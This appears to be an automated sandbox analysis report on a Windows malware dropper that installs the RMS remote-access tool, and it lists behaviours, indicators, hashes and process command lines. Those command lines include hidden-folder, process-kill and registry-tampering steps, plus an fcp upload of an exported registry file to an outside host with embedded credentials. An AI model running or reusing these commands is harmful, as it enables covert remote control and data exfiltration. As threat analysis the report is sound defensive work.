Analysis Overview
SHA256
a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
Threat Level: Known bad
The file 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee was found to be: Known bad.
Malicious Activity Summary
Rms family
RMS
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Executes dropped EXE
Identifies Wine through registry keys
Unsecured Credentials: Credentials In Files
Checks computer location settings
Loads dropped DLL
ACProtect 1.3x - 1.4x DLL software
Checks BIOS information in registry
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Runs .reg file with regedit
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: SetClipboardViewer
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-20 14:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-20 14:06
Reported
2025-05-20 14:08
Platform
win11-20250502-en
Max time kernel
148s
Max time network
144s
Command Line
Signatures
RMS
Rms family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\id.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4472 set thread context of 3752 | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 5116 set thread context of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\id.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | C:\Program Files (x86)\System\id.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
C:\Program Files (x86)\System\123.exe
"C:\Program Files (x86)\System\123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files (x86)\System"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /silentinstall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /start
C:\Program Files (x86)\System\rutserv.exe
"C:\Program Files (x86)\System\rutserv.exe"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\regedit.exe
regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
C:\Program Files (x86)\System\id.exe
"C:\Program Files (x86)\System\id.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
C:\Users\Admin\AppData\Local\Temp\fcp.exe
fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ivgenyroman22.hhos.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | x95244d7.beget.tech | udp |
Files
C:\Program Files (x86)\System\test.vbs
| MD5 | 7673f4b5eeccb819272231a4ea32754d |
| SHA1 | 6b1270c4eee7083932833ff9809eae34d50f5b51 |
| SHA256 | 95d605965a9f5b1a7e668156bdb0a6ba4b90a98c6337763eb4acd3bee80ea005 |
| SHA512 | 75f7505f167947ef0cd413c84dc587692450c3db5c03cde95a4712478791ff49afde135f31331e2c138913c728148c34860b7d2424db981625f299762ec8352e |
C:\Program Files (x86)\System\install.vbs
| MD5 | 316840cd95d80c8c879e0812a39e8151 |
| SHA1 | 6b1b804219c028c18311dd5c273b0cc3730c8044 |
| SHA256 | 4631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34 |
| SHA512 | 2295924c9a98fe19432df62503ddd18afb2c0af16168a8c276be4c3cf08ce1d98f1441e0a2a9d0ad68c4f3d843de00084a2303cd268791f25ce25a12d9b90036 |
C:\Program Files (x86)\System\install.bat
| MD5 | cf76cadc2887b23aab4f1f2330968548 |
| SHA1 | f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9 |
| SHA256 | d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef |
| SHA512 | 05ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7 |
C:\Program Files (x86)\System\123.exe
| MD5 | 3b084c7f7c666af58971760174c8f32b |
| SHA1 | b9a21429c6d35abf31eae7235dd3152beaf270fb |
| SHA256 | 3bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96 |
| SHA512 | d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c |
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
| MD5 | bc1b34ecfd1bf476402de205363f6372 |
| SHA1 | 2e97b088b30784c022ae556033d03b4c37b22573 |
| SHA256 | e282df4525b8e9a4ed45f48a708059c94a95709f6e4e9fc502a694047ae818a1 |
| SHA512 | 6510705430305656c90f07e46138226cdefaaa2f7699833e010e0cd65ebaefb1dab8406efe573c90b61179f79fc5a80e5e2a06976c534b64918ff94d197cc9b1 |
memory/4472-58-0x00000000002C0000-0x0000000000398000-memory.dmp
C:\Program Files (x86)\System\regedit.reg
| MD5 | fd06d4b501d310100f720d34ce0f7f2a |
| SHA1 | 4a0fedfda6a84c4e1ac6130a837a136947a82dd1 |
| SHA256 | 27997b89ef17f13a84c26cc3a3f7b4b1c6fc782f7257de05fcb204819897d8a3 |
| SHA512 | 9c6e0f09b490ee6b39f8ecd8df1058c5986295148c513a52cdc67da098ee72120db1c7ebc3ca864c7c3dd7ffb196bc2b5289ae06806db2e888dfa5788bf5ed91 |
memory/4472-60-0x0000000004DC0000-0x0000000004E5E000-memory.dmp
memory/4472-61-0x0000000007AD0000-0x0000000008076000-memory.dmp
memory/4472-62-0x00000000076C0000-0x0000000007752000-memory.dmp
memory/4472-63-0x0000000007650000-0x000000000765A000-memory.dmp
memory/4472-64-0x000000000A3B0000-0x000000000A44C000-memory.dmp
memory/4472-65-0x00000000050A0000-0x000000000513C000-memory.dmp
memory/4472-66-0x0000000005150000-0x000000000515A000-memory.dmp
memory/3752-67-0x0000000000400000-0x0000000000492000-memory.dmp
memory/3752-70-0x0000000000400000-0x0000000000492000-memory.dmp
memory/3752-72-0x0000000000400000-0x0000000000492000-memory.dmp
memory/3752-69-0x0000000000400000-0x0000000000492000-memory.dmp
memory/3752-68-0x0000000000400000-0x0000000000492000-memory.dmp
C:\Program Files (x86)\System\rutserv.exe
| MD5 | b097e79d33b826d728c3bcf635d0c382 |
| SHA1 | dc98020d4feec4dd72754f728a8505f27329561e |
| SHA256 | ba3d97e0051836aad5b6002ce7b00f120bc1b57efbc74ff042f80cd2ba59e96f |
| SHA512 | 0cb3e0db0d07c70eb320707f920bb6ddd09407ab33278498383805275df7bc9e6127049d2336bc6a8eef74e7b171af2f73eff8663f27f304cb8046301da71a64 |
memory/2300-77-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
| MD5 | 12789da76cc8737b715ffc82dc4be837 |
| SHA1 | c42ce86a036cf61c781731f4baf59b1deafaee3a |
| SHA256 | f34e1e970161c9b7a8a57e164fbd227265cc4d15d2a4b0bdb130f0c1f1bd8235 |
| SHA512 | bdcc89d7bad9899403d4396bb309ca2650de44caf3a35e1062a435077d415a5f103485a7c48bb2809673cff31ff5cd612e85a5f1fe491e7a14a2952ebcb8cf76 |
C:\Users\Admin\Desktop\Key\Key.txt
| MD5 | 7fa85ee66ad3c37306e01a041e48adff |
| SHA1 | a4a56aae1b0979bf72d32df5ed0cdfb33326c7cb |
| SHA256 | 7646355a353d254d4763f35d8859b87a2fb8e9508c7f3f60049fb97e79bc61a0 |
| SHA512 | fce7d75319a4102974d052176d0265bfdeceedca7c2cd35fc34dff9222d3bf49160182a35d1e3f9773a6b38e2c0d47b068dee6e3ec9ea6a769383d654a284802 |
memory/5116-94-0x00000000008D0000-0x0000000000916000-memory.dmp
memory/5116-95-0x00000000029D0000-0x00000000029DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{a8aw6353}.txt
| MD5 | 8ce704458e632d243a023357eec3702f |
| SHA1 | b4857c6a1e277776b8a08c243917eeae5470aa56 |
| SHA256 | 257947aba31142bab41ca56915c2ef843c2a156c527dee5d1a07e1224e380aed |
| SHA512 | a96d4aded8fd5ce2cfeeaba2bc69a399006bc723e1aa0777989648b2fe8caa7b6d421744c2bcd52b633d0e2d41b951df2cbc91ac64054c7b8cb63f887b496449 |
memory/2300-120-0x0000000000400000-0x000000000107A000-memory.dmp
memory/1968-126-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Roaming\ptst2Y9U2S6X2Y2Y9U2S6X2Y\General\cards.log
| MD5 | 833406139ec477aabb10628c3b5e75c7 |
| SHA1 | b303b77b367d401e9900bec03e33a2cfb846b7e4 |
| SHA256 | f8d5bf0b8b53fc90f9224504e0a488360c79929eb1c9ee3436d73daa611f17c0 |
| SHA512 | 76f1bae11ab39ea64b2a1daea8aefb56d42e79f8076c31fac27c5d535c28c6cec0dc6ec1dfe9302de5c77706965860ca92fdfb1e915e3a2e9292aec7ef887bd4 |
memory/5116-140-0x000000000A710000-0x000000000A71E000-memory.dmp
memory/2372-143-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2372-142-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2372-141-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4448-169-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1968-171-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2180-173-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5320-175-0x0000000000400000-0x000000000107A000-memory.dmp
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Program Files (x86)\System\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Program Files (x86)\System\rfusclient.exe
| MD5 | e96a511519df1055c9b564646a752b2d |
| SHA1 | e75b47954faf9ddd643b23110deca10164f571a0 |
| SHA256 | 3527e45b4ceec9f6526b5ba17d865395e1326f1ede774b0d6487a2146218613a |
| SHA512 | f5b99203d083935aeb4ba2ff1490d4d854afdb5c6ab294b239b8992866cbb5747298531f9e3e8353d64c3d248b0faf128c3f7e79249a30462c3991fbcdd76fc6 |
C:\Program Files (x86)\System\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
memory/5432-183-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5304-184-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/2180-182-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wVJxOQKKa.exe.log
| MD5 | 7e1ed0055c3eaa0bbc4a29ec1ef15a6a |
| SHA1 | 765b954c1adbb6a6ecc4fe912fdaa6d0fba0ae7d |
| SHA256 | 4c17576f64dea465c45a50573ee41771f7be9962ab2d07f961af4df5589bdcce |
| SHA512 | de7c784c37d18c43820908add88f08ab4864c0ef3f9d158cc2c9d1bab120613cb093dd4bfc5d7ed0c289414956cfe0b213c386f8e6b5753847dec915566297c8 |
C:\Program Files (x86)\System\id.exe
| MD5 | ba67693705f46b37b4f7d427d874d2bb |
| SHA1 | 502546afcab6bf7595d98cded71007ca60c340da |
| SHA256 | f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862 |
| SHA512 | 2258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea |
C:\Users\Admin\AppData\Local\Temp\id.vbs
| MD5 | 21cce90e924d3151a3c041382737cd32 |
| SHA1 | a5714a783cba4d307e243557ad58848e5c18626c |
| SHA256 | 4439fcafd565dfcf294b02cff6170b9a5754171bc2224c55da387a4907e6e9ce |
| SHA512 | 0c33cdb8edfdb2c48590252d9d9670df29d2d860113c9c2f1f998c9a075a23050277a6bfde38025fc89a937f71a27c6383525b5437ba40a7ae2419b32406a478 |
memory/3032-203-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/3032-205-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-206-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5432-207-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5304-208-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-209-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\id.bat
| MD5 | 2a9efc9fb8e8aa423aab3b20c46e04c7 |
| SHA1 | 313b324233c048b14e83228a4fa2efc0454b2002 |
